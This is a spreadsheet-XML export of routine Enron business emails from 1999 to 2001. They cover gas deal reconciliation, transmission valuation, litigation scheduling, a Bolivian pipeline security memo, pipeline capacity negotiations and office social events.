    <t>Wed, 12 Jan 2000 02:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kimberly.vaughn@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'daren.farmer@enron.com', 'anita.luong@enron.com'})</t>
  </si>
  <si>
    <t>Re: Sales to PanEnergy at Exxon Clear Lake for 2/99</t>
  </si>
  <si>
    <t xml:space="preserve">Daren.  I need a deal ticket for this._x000D_
_x000D_
---------------------- Forwarded by Kimberly Vaughn/HOU/ECT on 01/12/2000 _x000D_
09:24 AM ---------------------------_x000D_
_x000D_
_x000D_
	Anita Luong_x000D_
	01/07/2000 10:25 AM_x000D_
	_x000D_
To: Kimberly Vaughn/HOU/ECT@ECT_x000D_
cc: Robert E Lloyd/HOU/ECT@ECT, Howard B Camp/HOU/ECT@ECT _x000D_
Subject: Re: Sales to PanEnergy at Exxon Clear Lake for 2/99_x000D_
_x000D_
Kim,_x000D_
Please let me know if you have a chance to revisit this issue for meter 4045 _x000D_
for 2/99.....................let me know if you have questions..  thanks_x000D_
_x000D_
---------------------- Forwarded by Anita Luong/HOU/ECT on 01/07/2000 10:22 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
	Anita Luong_x000D_
	11/16/99 12:01 PM_x000D_
	_x000D_
To: Kimberly Vaughn/HOU/ECT@ECT_x000D_
cc: Howard B Camp/HOU/ECT@ECT, Robert E Lloyd/HOU/ECT@ECT _x000D_
Subject: Re: Sales to PanEnergy at Exxon Clear Lake for 2/99_x000D_
_x000D_
We need to revisit this issue again.   There is an exception at meter 4045 _x000D_
for 2/99.   In order to clear this up, I need an ECT transport delivery at _x000D_
this meter for the 34000mmbtu.   See July's allocations in POPS for _x000D_
reference.    The displacement gas were scheduled as a delivery. _x000D_
_x000D_
I would like to have this issue resolved as soon as possible so that we _x000D_
could  clear this off our list._x000D_
_x000D_
Let me know if you have questions._x000D_
_x000D_
Thanks_x000D_
_x000D_
---------------------- Forwarded by Anita Luong/HOU/ECT on 11/16/99 11:53 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
	Anita Luong_x000D_
	05/25/99 03:36 PM_x000D_
	_x000D_
To: Kimberly Vaughn/HOU/ECT@ECT_x000D_
cc: Howard B Camp/HOU/ECT@ECT _x000D_
Subject: Re: Sales to PanEnergy at Exxon Clear Lake for 2/99_x000D_
_x000D_
Kim,_x000D_
_x000D_
ECT sold 34,000mmbtu to PanEnergy at meter 4045 for 2/99.   I've verified w/ _x000D_
Rebekah Seales and she has determined that ECT did sell this gas to _x000D_
PanEnergy.  Therefore, we need to show a delivery at this meter for PanEnergy _x000D_
or whomever PanEnergy is selling this gas to at this point in POPS.  I need a _x000D_
delivery at this meter in order for this meter to balanced.  _x000D_
_x000D_
Please take a look at this.  Call me if you have questions_x000D_
_x000D_
Thanks._x000D_
---------------------- Forwarded by Anita Luong/HOU/ECT on 05/25/99 03:08 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Rebekah E Seales_x000D_
05/25/99 03:04 PM_x000D_
To: Anita Luong/HOU/ECT@ECT_x000D_
cc: Daren J Farmer/HOU/ECT@ECT, Howard B Camp@CCMAIL _x000D_
Subject: Re: Sales to PanEnergy at Exxon Clear Lake for 2/99  _x000D_
_x000D_
Anita:_x000D_
_x000D_
I did some additional research regarding the sale to PanEnergy at meter 4045 _x000D_
on 2/27 and 2/28.  This sale was a brokered deal._x000D_
_x000D_
_x000D_
_x000D_
DATE   PURCHASE   VOLUME  SALE_x000D_
2/27 &amp; 2/28  Phillips Gas Mkt. (#55397)  10.000 MMBtu  PanEnergy Marketing _x000D_
(#64749) 10.000 MMBtu_x000D_
2/27 &amp; 2/28  Superior Natural Gas (#57065)   7.000 MMBtu  PanEnergy Marketing _x000D_
(#64749)   7.000 MMBtu_x000D_
_x000D_
ECT did not transport this gas away from meter 4045.  If this gas was _x000D_
transported away from meter 4045, it would have been a transaction between _x000D_
PanEnergy Marketing (or whomever they sold the gas to at that point) and _x000D_
HPL.  Hope this information helps._x000D_
_x000D_
RS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Anita Luong_x000D_
	05/25/99 01:31 PM_x000D_
	_x000D_
To: Rebekah E Seales/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Sales to PanEnergy at Exxon Clear Lake for 2/99_x000D_
_x000D_
	_x000D_
_x000D_
Just want to check see if you have a chance to look at this.............._x000D_
_x000D_
---------------------- Forwarded by Anita Luong/HOU/ECT on 05/25/99 01:30 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Rebekah E Seales_x000D_
05/24/99 03:31 PM_x000D_
To: Anita Luong/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Sales to PanEnergy at Exxon Clear Lake for 2/99  _x000D_
_x000D_
Anita:_x000D_
_x000D_
I'm working on renominating back to 5/1 to the pipeline for the current _x000D_
month.  I'll work on this first thing tomorrow morning.  Please let me know _x000D_
if you need the information sooner._x000D_
_x000D_
Thanks!_x000D_
RS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Anita Luong_x000D_
	05/24/99 02:10 PM_x000D_
	_x000D_
To: Rebekah E Seales/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Sales to PanEnergy at Exxon Clear Lake for 2/99_x000D_
_x000D_
Additional info I see in Path Manager.................._x000D_
_x000D_
Seems like this is a brokered deal, ECT is buying 20,000mmbtu from Philips _x000D_
Gas and 14,000mmbtu from Superior Gas and sell the total 34,000mmbtu to _x000D_
PanEnergy._x000D_
_x000D_
My question is then who is paying for the tranport of this gas, ECT or _x000D_
PanEnergy?  We need to schedule for the delivery of this gas at meter 984045._x000D_
_x000D_
Please let me know_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Feb 2001 01:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'david.delainey@enron.com', 'richard.shapiro@enron.com', 'jklauber@llgm.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Transmission value and first mortgage debt</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
The proposed purchase of the PGE and SCE's transmission grids have vastly _x000D_
different short term liquidity effects for PGE and SCE.   If the current _x000D_
proposal is at 2.3x book, and assuming the first mortgage bond holders want _x000D_
complete repayment in return for releasing their liens, the numbers (at _x000D_
12-99) fall out:_x000D_
_x000D_
in millions                   PGE        SCE_x000D_
_x000D_
Book Value                    1.43       1.90_x000D_
Multiple of Book              2.3x       2.3x_x000D_
Cash Price                   $3.29      $4.37_x000D_
_x000D_
-First Mortgage Bonds        $3.35      $1.18_x000D_
Resulting liquidity         ($0.06)     $3.19_x000D_
_x000D_
_x000D_
Note that the first mortgage holders may release their liens in return for _x000D_
partial payment based on remaining value.  Nonetheless, PGE's situation is _x000D_
not as flexible.</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 14:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'melanie.gray@weil.com'})</t>
  </si>
  <si>
    <t>Re: PCA</t>
  </si>
  <si>
    <t xml:space="preserve">Has Liz finished with gathering the documents?_x000D_
_x000D_
_x000D_
_x000D_
	melanie.gray@weil.com_x000D_
	11/13/2000 03:43 PM_x000D_
		 _x000D_
		 To: richard.b.sanders@enron.com_x000D_
		 cc: _x000D_
		 Subject: PCA_x000D_
_x000D_
_x000D_
Here are the revised dates for the response/reply/and hearing dates for_x000D_
Enron's motion to compel.  As you may recall, they say they want a_x000D_
deposition on the parties'  intention.  We should be expecting a deposition_x000D_
notice soon if they are going to follow through on their threat._x000D_
_x000D_
I passed along to Liz Austin your request regarding pleadings A&amp;K has filed_x000D_
setting forth the Trustee's position in connection with the_x000D_
enforcement/nonenforcement of the power contracts and what remedies the_x000D_
Trustee is seeking.  As you see below, she is pulling those together._x000D_
_x000D_
Call to discuss the response to the Trustee's settlement offer._x000D_
_x000D_
Thanks._x000D_
---------------------- Forwarded by Melanie Gray/HO/WGM/US on 11/13/2000_x000D_
03:41 PM ---------------------------_x000D_
_x000D_
_x000D_
"Austin, Elizabeth J." &lt;EA@PULLCOM.COM&gt; on 11/13/2000 03:35:16 PM_x000D_
cc:_x000D_
Subject:  PCA_x000D_
_x000D_
_x000D_
Hi--Talked to Craig and the Court today.  The motion to compel is now_x000D_
scheduled for Dec. 12 at 2p.m.  The trustee's oppositon papers are now due_x000D_
Nov 27 and Enron reply is due Dec 1.  I have my paralegal gathering the_x000D_
pleadings Enron requested.  That is all for now.--Liz_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********NOTE**********_x000D_
The information contained in this email message is intended only_x000D_
for use of the individual or entity named above.  If the reader_x000D_
of this message is not the intended recipient, or the employee or_x000D_
agent responsible to deliver it to the intended recipient, you_x000D_
are hereby notified that any dissemination, distribution or_x000D_
copying of this communication is strictly prohibited.  If you_x000D_
have received this communication in error, please immediately_x000D_
notify us by telephone (713-546-5000), and destroy the original_x000D_
message. Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 08:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kathleen.carnahan@enron.com', 'carlos.sole@enron.com'})</t>
  </si>
  <si>
    <t>Next week</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 03/15/2001 04:11 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
03/15/2001 04:03 PM_x000D_
To: Jeffrey T Hodge/HOU/ECT@ECT, Barbara N Gray/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Next week_x000D_
_x000D_
I have a change in plans next week.  My dad is having surgery in Ft. Worth, _x000D_
so I will be heading that way on Monday.  I was planning to be on vacation _x000D_
anyway, but I may have some accessibility challenges in Ft. Worth which I _x000D_
would not have had otherwise.  I will manage client expectations accordingly._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 15:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'diversity.survey@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'kruscit@enron.com'})</t>
  </si>
  <si>
    <t>Diversity Survey</t>
  </si>
  <si>
    <t>This is a message from Cindy Olson, Executive VP, Human Resource &amp; Community _x000D_
Relations._x000D_
_x000D_
Please take a few minutes to complete the attached, very brief survey. Your _x000D_
input is important in helping determine future efforts in this vital area._x000D_
_x000D_
You have been randomly selected to participate in the second of an ongoing _x000D_
series of surveys that will be conducted to help us gauge how effectively we _x000D_
are leveraging diversity to enhance our organization._x000D_
_x000D_
As you know, Enron is engaged in a struggle to recruit and retain the quality _x000D_
of talent necessary to allow us to meet and beat our competition.  The _x000D_
business case for diversity is inarguable and we must step-up to the _x000D_
challenge of recruiting, developing and continually valuing an increasingly _x000D_
diverse workforce.  Such an effort requires that we look at diversity in a _x000D_
broader context that combines the different thoughts and ideas, life and work _x000D_
experiences, as well as skill sets of employees. It is this combination that _x000D_
will enable Enron to remain the leading innovator and one of the most admired _x000D_
companies in the world._x000D_
_x000D_
Thanks in advance for your cooperation and contribution._x000D_
_x000D_
_x000D_
http://nahou-wwetc01t/wi/p0180008/i.asp?r=799&amp;s=CGFBNRCT&amp;l=9</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 06:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: paintball</t>
  </si>
  <si>
    <t xml:space="preserve">i'm in if you give me more details - i.e. where._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brian Hoskins@ENRON COMMUNICATIONS_x000D_
01/10/2001 01:59 PM_x000D_
To: Eric Bass/HOU/ECT@ECT, Hector Campos/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: paintball_x000D_
_x000D_
you guys interested?_x000D_
_x000D_
______________________x000D_
Brian T. Hoskins_x000D_
Enron Broadband Services_x000D_
713-853-0380 (office)_x000D_
713-412-3667 (mobile)_x000D_
713-646-5745 (fax)_x000D_
Brian_Hoskins@enron.net_x000D_
_x000D_
_x000D_
----- Forwarded by Brian Hoskins/Enron Communications on 01/10/01 02:07 PM _x000D_
-----_x000D_
_x000D_
	Kenneth D'Silva@ECT_x000D_
	01/10/01 11:24 AM_x000D_
		 _x000D_
		 To: Vridhay Mathias/NA/Enron@ENRON, Matthew Lippert/HOU/ECT@ECT, Lenine _x000D_
Jeganathan/HOU/ECT@ECT, Mark Broadfoot/HOU/ECT@ECT, Nick _x000D_
Paraschos/Corp/Enron@ENRON, Brian Hoskins/Enron Communications@Enron _x000D_
Communications, Frank Economou/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: paintball_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kenneth D'Silva/HOU/ECT on 01/10/2001 _x000D_
11:16 AM ---------------------------_x000D_
_x000D_
_x000D_
georgekissamis@marekbros.com on 01/10/2001 10:11:56 AM_x000D_
To: abelramon@hotmail.com, Ratak@yahoo.com, RCardello@aol.com, _x000D_
kdsilva@ect.enron.com, lannebart@yahoo.com, mrryt@sbec.com, _x000D_
bflauaus@yahoo.com, margon65@yahoo.com, aeiacono@HOTMAIL.com, _x000D_
sleahj@yahoo.com, karenhass@worldnet.att.net, rlmalli@yahoo.com, _x000D_
McConnell_001@email.msn.com, Angela.M.Pastorino@exxonmobil.com, _x000D_
redneckjmp@yahoo.com, irodrigu@ev1.net, martin.rosetta@enron.com, _x000D_
valseper@sprintmail.com, Vseperuh@aol.com, vuson@ruf.rice.edu, _x000D_
Lawangen@excite.com_x000D_
cc:  _x000D_
Subject: paintball_x000D_
_x000D_
_x000D_
Addendum No. 1_x000D_
_x000D_
To whom it may concern:_x000D_
_x000D_
It has been brought to my attention that there are some people who are_x000D_
interested in playing paintball games.  However, we were going to play this_x000D_
weekend but there are a lot of people who are unable to play due to_x000D_
previous engagements so we are going to reschedule it for Saturday, January_x000D_
20, 2001.  It will cost about $22.00 and that includes admission for the_x000D_
whole day, rental of the gun and one Co2 cartridge.  However, paintballs_x000D_
are extra and they cost about $6.50 per 100.  If we do end up playing it_x000D_
would be recommend to bring a sandwich and drinks because there is not much_x000D_
out there._x000D_
_x000D_
If you could, please RSVP by Wednesday, January 17, 2001, that way we can_x000D_
decide if we have enough people to even play.  Rain or Shine!_x000D_
_x000D_
Thank you,_x000D_
_x000D_
George Kissamis_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Mar 2000 06:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laine.powell@enron.com'})</t>
  </si>
  <si>
    <t>=?ANSI_X3.4-1968?Q?Re:_Tradu=3F=3Fo?=</t>
  </si>
  <si>
    <t xml:space="preserve">Laine:_x000D_
_x000D_
Having reviewed Abe's and Eduardo's comments on the joint security assessment _x000D_
report, I would like to provide my comments:_x000D_
_x000D_
The things you should look at doing:_x000D_
_x000D_
1. Get the government involved in enforcing the laws and stopping the illegal _x000D_
behavior.  Let the government decide how to do that - whether through the _x000D_
national police or the military.  "Get the government involved" is not quite _x000D_
the same as "bring in the Army" - although that may be a part of the final _x000D_
decision.  Pointing out to the government that the project is important to _x000D_
Bolivia as well at to Enron/Shell may help to get them off dead center._x000D_
_x000D_
2. Expand your PR program to include education of the people about illegal _x000D_
acts and their consequences.  Obviously if the government doesn't want to get _x000D_
involved, there won't be any consequences and in that case you might as well _x000D_
skip this step.  You may already have assets in place to do this - the CLO's _x000D_
and Jose Castro of GOB(?).  A little more push with the local civic committee _x000D_
to get them to accept your bringing in an outside member._x000D_
_x000D_
3. Consider bringing in outside security people from Santa Cruz (Wackenhut _x000D_
can get you national police on contract) to ride 'shotgun' on the vehicles _x000D_
and protect work sites and offices, if you feel a physical threat exists to _x000D_
your employees.  The cost will be high, as you will have to provide housing, _x000D_
food and transportation in addition to salary.  This would help in reducing _x000D_
the number of 'carjackings' of your vehicles and threats to your employees.  _x000D_
This might, however, have a negative impact overall, and the confrontations _x000D_
may turn violent if the youth organization won't back down from a fight.  _x000D_
Escalation at this point in the construction might lead to a longer _x000D_
completion time than if you just 'go with the flow'.  In my opinion, I would _x000D_
use this only if the government doesn't get involved in crime suppression _x000D_
activities._x000D_
_x000D_
4. Refuse to continue paying extortion to the populace.  Bear in mind, _x000D_
however, that this decision will probably escalate future incidents, with _x000D_
results equivilent to those mentioned above in #3._x000D_
_x000D_
The above are my immediate recommendations - the below are my general _x000D_
comments:_x000D_
_x000D_
- I think the problem is more than just the 'PR issue' that the report seems _x000D_
to indicate.  There are illegal acts being committed, in violation of _x000D_
Bolivian laws, by a populace who is used to doing things their own way, _x000D_
without the benefit of following laws made by the government far away who _x000D_
doesn't take an active interest in crime suppression.  The only remedy for _x000D_
committing illegal acts is punishment for the offender, which sends a message _x000D_
to the community that illegal acts will not be condoned.  Can Enron punish _x000D_
the offender?  No - that can only come from the government through their _x000D_
legal system.  Enron should not be required to submit to extortion by groups _x000D_
committing illegal acts.  Enron's push here should be to get the government _x000D_
involved at whatever level it takes to investigate and prosecute those _x000D_
committing the illegal acts.  _x000D_
_x000D_
- You have a short time frame to work in before the project is complete.  _x000D_
Putting things in motion now wouldn't guarantee they would be in place before _x000D_
the end of the project - however, the operator of the pipeline is going to _x000D_
have to face these or similar issues - they are not going to go away just _x000D_
because the pipeline is finished.  The acceptance by the general populace of _x000D_
use of illegal acts can easily become a breeding ground for future sabotage _x000D_
of the pipeline, kidnapping of employees and contractors.  Whatever _x000D_
short-term solution you use will affect the long-term security of the _x000D_
pipeline, and needs to be well considered.  Whatever other options you have, _x000D_
education of the people probably wouldn't hurt.  If the operator of the PL _x000D_
can get involved in the education of the populace, it would be in it's best _x000D_
interest to do so._x000D_
_x000D_
- Your subcontractor, Conduto, seems to be a focal point for at least some of _x000D_
the problems through their non-use of local labor.  There is no indication in _x000D_
the report or in Abe's comments that the local populace are qualified for _x000D_
available jobs.    Maybe a lesson learned for next project - try to use local _x000D_
labor where possible (and qualified).  This friction - between Conduto and _x000D_
the populace - seems to be the major issue._x000D_
_x000D_
- The CLO concept, as I understand Abe's comments, seems to be on the right _x000D_
track, but maybe their responsibility should be expanded to include educating _x000D_
the populace that there is a difference in nogotiating for something in good _x000D_
faith rather than under duress.  Also that Illegal acts will not be _x000D_
tolerated.  One potential problem I see is that if GOB refuses to negotiate _x000D_
over future issues (wants of the people), then, without the education part of _x000D_
it in place, you will probably see sabotage on the PL or of company vehicles, _x000D_
and possibly violence against your employees.  Obviously you want to continue _x000D_
to use people such as Jose Castro - possibly expanding his role to include _x000D_
education issues._x000D_
_x000D_
In any case, this is not a problem that is going to go away overnight, and _x000D_
any actions you take at this point may not have a positive effect by the time _x000D_
the project is complete.  Hindsight is always better - maybe for the next _x000D_
project we will consider a due diligence assessment of the areas our pipe _x000D_
will pass through and see if similar conditions exist there._x000D_
_x000D_
Hope to see you before long._x000D_
_x000D_
Regards,_x000D_
_x000D_
Mike Hicks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Laine A Powell@ENRON_DEVELOPMENT_x000D_
03/14/2000 03:25 AM_x000D_
To: Michael Hicks@ECT_x000D_
cc: Abraham Moreno/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Tradu??o_x000D_
_x000D_
Mike -_x000D_
_x000D_
 Attached is a copy of the translation of Eduardo Cordi's comments to the _x000D_
investigation done by the security folks in San Matias.  Summarizing Abe's _x000D_
comments and Eduardo's the reaction seems to be that many of the _x000D_
recommendations don't apply for the area.  Am not sure what the next step _x000D_
should be.  Any suggestions?_x000D_
_x000D_
rgds_x000D_
_x000D_
Laine_x000D_
---------------------- Forwarded by Laine A Powell/ENRON_DEVELOPMENT on _x000D_
14-03-2000 07:21 AM ---------------------------_x000D_
_x000D_
_x000D_
Clarissa Sauer_x000D_
13-03-2000 06:32 PM_x000D_
To: Laine A Powell/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Tradu??o_x000D_
_x000D_
Laine, _x000D_
_x000D_
A tradu??o que vc me pediu._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rgds, _x000D_
Clarissa_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Feb 2001 01:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hi Mark!</t>
  </si>
  <si>
    <t>Greetings, Mark.  Can you give Jeff a call at the office today when you have _x000D_
a minute?  He's anxious to talk to you...  713.853.6894.  Hope all went well _x000D_
and as expected on Wednesday!  SRS</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 04:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sager.john@epamail.epa.gov'})</t>
  </si>
  <si>
    <t>personal representative</t>
  </si>
  <si>
    <t>I got a letter from Hodes, Ulman, Pessin &amp; Katz asking me to sign a_x000D_
personal representative resignation/consent form appointing Laurence Tracy_x000D_
as representative.  Should I sign it?  It also says "I may not withdraw_x000D_
this consent".  That seems absurd.</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.foster@enron.com', 'mike.grigsby@enron.com', 'phillip.allen@enron.com', 'randall.gay@enron.com', 'patti.sullivan@enron.com', 'tori.kuykendall@enron.com'})</t>
  </si>
  <si>
    <t>El Paso Complaint</t>
  </si>
  <si>
    <t xml:space="preserve">Below is a summary of the discussions last week regarding the complaint _x000D_
against El Paso for oversubscribing the Socal Topock Point._x000D_
_x000D_
The meeting started out by summarizing the dollar impact of the Border cuts _x000D_
to Amoco and Burlington of $3 million dollars and the additional fuel costs  _x000D_
of $15 million that they have incurred when the mainline fuel was reduced and _x000D_
the gathering fuel was increased.  Accordingly, producers are seeking a _x000D_
minimum of $17  million in compensation in some form or  another._x000D_
_x000D_
The biggest concern is that a total of 1.2 bcf/day is being nominated at the _x000D_
Socal Topock which can only deliver 540000 mmbtu/day.   Socal Gas stated that _x000D_
this problem should go away when there system becomes unbundled (referred to _x000D_
as Gatekeeper)..  The proceeding is currently pending CPUC approval and could _x000D_
be implemented as early as October 1, 2001.  When the Gatekeeper is _x000D_
implemented  , only 540000 mmbtu/day will be accepted at the Socal Topock _x000D_
border and must match up with the intra-state transport.  _x000D_
_x000D_
SoCal Gas suggested taking the 1.2 bcf/day of nominations at the Topock _x000D_
delivery point and divide it up based on the original intent of the _x000D_
capapcity-  400 to Mohave; 540 to Socal Topock;  and 180 to PGE Topock.  They _x000D_
also stated they would accept less than 540 at Topock but  needed a minimum _x000D_
of 300 to meet core needs.  However, they wanted some type of compensation if _x000D_
their volume was reduced.   They also agreed to live with the status quo _x000D_
until the Gatekeeper was implemented.  This would result in firm rights being _x000D_
established at Socal Topock based on downstream rights._x000D_
_x000D_
Williams owns Block 3 capacity and is willing to look at a CD reduction or a _x000D_
reduced take requirement or use of alternate points with a rate adjustment._x000D_
_x000D_
After much discussion,  El Paso came back with the following counter proposal:_x000D_
_x000D_
Recommended interim solution until Socal Gatekeeper implemented.  Does not _x000D_
relate to receipt point rights._x000D_
_x000D_
1)  Block 1 Capacity will always be alternate to Socal Topock (198000);_x000D_
_x000D_
2)Block II Capacity can not be sold at PGE Topock (614000)_x000D_
_x000D_
3) Amoco and OneOk each have a contract 45000/d which can go to Topock or _x000D_
Ehrenberg.  It is recommended that they_x000D_
 give up their Ehrenberg right and keep Topock right and Socal will give up _x000D_
like amount at Topock as well as shift an additional  70000 mmbtu/day from _x000D_
Topock to Ehrenberg resulting in approx. 115000 being shifted  to Ehrenberg._x000D_
_x000D_
4) Rights fro expansion shippers would be carved up as follows:_x000D_
_x000D_
   Socal Topock   PGE/Mohave Topock_x000D_
Texaco   40    135_x000D_
Burlington  26    74_x000D_
Aero   5    15_x000D_
Borax   7    12_x000D_
LADWP  0    36_x000D_
SWGas   0    20_x000D_
_x000D_
5) Socal Topock would now be divided as follows:_x000D_
_x000D_
Expansion Shippers  78000 _x000D_
Socal Gas           425000_x000D_
BLK 3                               348000 (25-Amoco;20-Oneok;99-Williams;189 _x000D_
El Paso Merchant;15-Wlliams)_x000D_
Total 851000_x000D_
540 divided by 841 would result in 37 percent cuts or 63 percent thruput._x000D_
_x000D_
The producers were not happy with having to live with 37 percent cuts and _x000D_
felt that any transport sold after their Sept 28 complaint should be cut off _x000D_
the top which would be El Paso merchant services Blk 3._x000D_
_x000D_
Separate meetings were then held amongst the Topock shippers to duscuss El _x000D_
Paso's counter -proposal.  _x000D_
_x000D_
Producer group came back and told El Paso that they want the 63 percent _x000D_
thruput increased.  Will accept CD reduction, rate design change or other _x000D_
forms of compensation.   For  the recommended volumes moved to Mohave/Pge _x000D_
Topock, they would consider a 30 percent reduction in CD demand as well as _x000D_
converting that path to a 100 volumetric rate.  In other words, if the _x000D_
producers used the delivery point, they would pay max rate.  If they did not, _x000D_
they would not pay anything._x000D_
_x000D_
Block 3 shippers would agree to reduce deliveries to Socal Topock if their _x000D_
deals were converted to an agreed upon load factor-maybe 70 percent.  For _x000D_
volumes shifted to non-Socal Points , they also want a 100 percent volumetric _x000D_
rate._x000D_
_x000D_
Bottom-line is  how much dollars is El Paso willing to pay to resolve this _x000D_
case.  Each party is requested to submit a proposal to El Paso and they will _x000D_
study  its entirety.  No follow-up meeting was scheduled._x000D_
_x000D_
Another topic that was also being discussed at the meeting was the perceived _x000D_
gaming on the system by the full-requirements customers-ie nominating more _x000D_
gas than they need in anticipation of cuts.  It is thought that if this could _x000D_
be controlled there may be more certainty in the san juan regarding flows.  _x000D_
El Paso recommended the following :  Limit noms on Cycle 1 from San Juan _x000D_
based on previous day's  total nom from all basins.   No limits on Cycle _x000D_
2-4.  This caused some concerns because of week-end load swings _x000D_
andfluctuatingpower-plant loads.  However, eoc's were willing to establish a _x000D_
technical committee to work on a formula if theSocal Topock point gets _x000D_
resolved._x000D_
_x000D_
Regarding pooling, El Paso is proposing to add 8 additional pools in the _x000D_
keystone and 3 additonal pools in the san juan and 1 additional pool in the _x000D_
bondad.  This process is in its early stages of conflict.  Most people (Duke, _x000D_
Southern, Williams, Coral)  are not on board with this.  I will keep you _x000D_
advised of development.  Please advise if you have any questions._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 11:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>GE conference call</t>
  </si>
  <si>
    <t>Please send out a reminder of the GE conference call to the following:_x000D_
_x000D_
Sheila_x000D_
Rose_x000D_
Lisa_x000D_
Scott_x000D_
Mike Barnas_x000D_
Kent shoemaker_x000D_
steve swift_x000D_
Ben jacoby_x000D_
_x000D_
We don't need a conference room this week._x000D_
_x000D_
Thanks,_x000D_
_x000D_
kay</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 09:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>bro fees with Bloomberg</t>
  </si>
  <si>
    <t xml:space="preserve">Kate, please verify with traders_x000D_
tom_x000D_
deal 512827.01_x000D_
enron sells merrill_x000D_
260.00   Q2    2001_x000D_
25 mws_x000D_
_x000D_
bloomberg has fee .005   we have zero_x000D_
_x000D_
bob badeer_x000D_
deal 512927.01_x000D_
Enron sells merrill_x000D_
Q2 2001_x000D_
250.00_x000D_
_x000D_
bloomberg has .005 fee, we have zero_x000D_
_x000D_
if fee_x000D_
please add_x000D_
_x000D_
thanks </t>
  </si>
  <si>
    <t>Fri, 21 Sep 2001 13:18:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dorie.hitchcock@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'a..shankman@enron.com', 'jeffrey.mcmahon@enron.com', 'raymond.bowen@enron.com', 'john.lavorato@enron.com', 'mike.mcconnell@enron.com'})</t>
  </si>
  <si>
    <t>TEXACO/HAVOLINE GRAND PRIX</t>
  </si>
  <si>
    <t>The Texaco/Havoline Grand Prix of Houston will take place downtown on October 5-7, 2001.  Enron has developed a relationship with the PacWest Racing Team, a member of the CART FedEx Championship Series featuring drivers Scott Dixon and Mauricio Gugelmin, which will enable us to offer our customers and executives a one of a kind hospitality package that will include the following features:_x000D_
_x000D_
Gourmet hospitality including breakfast and lunch prepared for Enron guests by an on-site chef at the race track in PacWest's Summit (mobile hospitality and business suites)_x000D_
Paddock passes allowing Enron guests to visit the garage areas where race car preparation takes place and providing a "behind the scenes" look at the business of motor sports_x000D_
Sunday race event tickets located in Grandstand C, just before turn one and adjacent to the PacWest Summit_x000D_
Special PacWest driver autograph and "meet and greet" sessions for Enron guests_x000D_
Guided tours of PacWest's transporters and garage areas for Enron guests thereby providing a hands-on look at how the race cars are prepared for the weekend's on-track activities_x000D_
Opportunity to network with companies that support PacWest including but not limited to: NEXTEL, JP Morgan Chase, Gemstar, Pennzoil, PPG, Tully's Coffee, Snap-On, Bosch, Freightliner, Toyota, Panasonic, 3D Village_x000D_
_x000D_
I currently have the following tickets available for this event:_x000D_
	Friday, October 5 - 4 Tickets_x000D_
	Saturday, October 6 - 15 Tickets_x000D_
	Sunday, October 7 - 20 Tickets_x000D_
(No cost will be allocated back to Company and RC numbers)_x000D_
_x000D_
Please let me know how many tickets you would like to reserve for this event by Tuesday, September 25._x000D_
